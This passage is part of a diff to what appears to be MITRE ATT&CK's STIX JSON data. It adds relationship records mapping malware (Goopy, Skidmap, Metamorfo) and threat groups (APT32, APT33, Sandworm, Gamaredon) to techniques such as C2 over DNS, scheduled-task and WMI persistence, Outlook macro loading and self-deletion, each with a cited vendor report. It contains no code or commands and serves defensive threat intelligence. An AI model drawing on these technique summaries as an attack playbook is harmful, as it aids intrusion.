+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to maintain persistence by creating scheduled tasks set to run every hour.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f230afd5-2186-4d97-94ce-5ce3face8bc6",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.983Z",
+ "created": "2020-06-19T21:25:43.680Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over DNS.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--00aa618f-bcfa-4649-8436-134f9d01e43c",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.941Z",
+ "created": "2020-06-19T21:25:43.683Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over HTTP.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8e17260d-d028-4d6b-9a45-4e767ecb88c3",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.939Z",
+ "created": "2020-06-19T21:25:43.686Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has abused the PasswordChangeNotify to monitor for and capture account password changes.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--dc8bedf8-c6fe-4b99-bde0-db676ba35a91",
+ "type": "relationship",
+ "modified": "2020-06-19T21:36:31.630Z",
+ "created": "2020-06-19T21:36:31.630Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--f7ea9daf-5233-48b3-918f-9cea402b708f",
+ "type": "relationship",
+ "modified": "2020-06-19T21:38:45.615Z",
+ "created": "2020-06-19T21:38:45.615Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has checked for the existence of specific files including /usr/sbin/setenforce and /etc/selinux/config. It also has the ability to monitor the cryptocurrency miner file and process. (Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--472c61e4-e839-4766-b1ce-d9095203e538",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.765Z",
+ "created": "2020-06-22T14:58:06.557Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check if /usr/sbin/setenforce exists. This file controls what mode SELinux is in.(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--49f761f9-89d2-4e6f-a0c6-fc5e32cca471",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.168Z",
+ "created": "2020-06-22T14:58:06.560Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has encrypted it's main payload using 3DES.(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--2329d963-f01b-46bd-8868-99cf436a508a",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.768Z",
+ "created": "2020-06-22T14:58:06.594Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has monitored critical processes to ensure resiliency.(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--8ca0a20d-2c12-4b68-a2a9-ebd95c05ee68",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.796Z",
+ "created": "2020-06-22T14:58:06.599Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download, unpack, and decrypt tar.gz files .(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--952412b3-a7b1-402c-a92e-96830df4d14b",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.205Z",
+ "created": "2020-06-22T14:58:06.602Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download files on an infected host.(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--1eb0fe9c-86e9-4c8c-8a24-c7b139559971",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.200Z",
+ "created": "2020-06-22T14:58:06.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--42d2f7f0-9548-4bdd-9e88-7200a9e91b57",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.036Z",
+ "created": "2020-06-22T15:45:19.036Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has inserted malicious macros into existing documents, providing persistence when they are reopened. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the /altvba option, once the Application.Startup event is received.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f78a5009-59ec-4ae2-89a0-44b8be49a140",
+ "type": "relationship",
+ "modified": "2020-06-22T19:08:12.265Z",
+ "created": "2020-06-22T19:08:12.265Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used cmd.exe /c to execute files.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--c7735813-64b9-47ba-8d98-81e7bfc25a80",
+ "type": "relationship",
+ "modified": "2020-06-22T19:56:19.422Z",
+ "created": "2020-06-22T19:56:19.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has used VBScript to initiate the delivery of payloads.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e0d647cf-69a0-416f-8db4-cfd72fbd6ad3",
+ "type": "relationship",
+ "modified": "2020-06-22T20:15:32.199Z",
+ "created": "2020-06-22T20:15:32.199Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has used compromised Office 365 accounts in tandem with [Ruler](https://attack.mitre.org/software/S0358) in an attempt to gain control of endpoints.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e93a3bf7-2ca4-42ed-872a-f9f0f8458936",
+ "type": "relationship",
+ "modified": "2020-06-29T15:02:31.591Z",
+ "created": "2020-06-22T20:15:32.190Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has sent spearphishing e-mails with archive attachments.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--54fd87c2-7d29-422f-bf92-96e7d603563f",
+ "type": "relationship",
+ "modified": "2020-06-22T20:15:32.216Z",
+ "created": "2020-06-22T20:15:32.216Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has used malicious e-mail attachments to lure victims into executing malware.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ed0428f5-d354-4827-8f9a-95177ce0a1cb",
+ "type": "relationship",
+ "modified": "2020-06-22T20:15:32.208Z",
+ "created": "2020-06-22T20:15:32.208Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455)'s C&C communication has been encrypted using OpenSSL.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--104334fa-4d32-48ab-a55d-c481ce7c4cd3",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.348Z",
+ "created": "2020-06-22T20:34:05.348Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used MSI to download files for execution.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--de745ef4-59a0-470c-95c9-5043a717dc54",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.362Z",
+ "created": "2020-06-22T20:34:05.362Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has deleted itself from the system after execution.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--667c0879-3ea2-48f1-9a1b-ceefca33aa43",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.376Z",
+ "created": "2020-06-22T20:34:05.376Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has digitally signed executables using Avast.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--baeb8449-b956-4119-aea5-717570edb513",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.387Z",
+ "created": "2020-06-22T20:34:05.387Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used HTTP for downloading items.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--168f47ab-980f-4e10-91f4-ffd2acf09a7f",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.396Z",
+ "created": "2020-06-22T20:34:05.396Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has written process names to the Registry.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--676c5a2a-323b-4166-9c83-8c6e5e25bb1f",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.403Z",
+ "created": "2020-06-22T20:34:05.403Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has performed process name checks and has monitored applications.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--eac61f60-a87d-4f83-b5e0-64542efeca6b",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:05.416Z",
+ "created": "2020-06-22T20:34:05.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) developed the payload using JavaScript.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--07f72efd-7960-4530-92f3-6ced33087212",
+ "type": "relationship",
+ "modified": "2020-06-23T19:58:26.065Z",
+ "created": "2020-06-22T20:34:05.418Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
+ "target_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "external_references": [
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
+ }
+ ],
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has attempted to use WMI event subscriptions to establish persistence on compromised hosts.(Citation: Microsoft Holmium June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9e1bb696-e1f0-46d3-ab91-79280323d711",
+ "type": "relationship",
+ "modified": "2020-06-22T20:34:36.748Z",
+ "created": "2020-06-22T20:34:36.748Z"
+ },
+ {
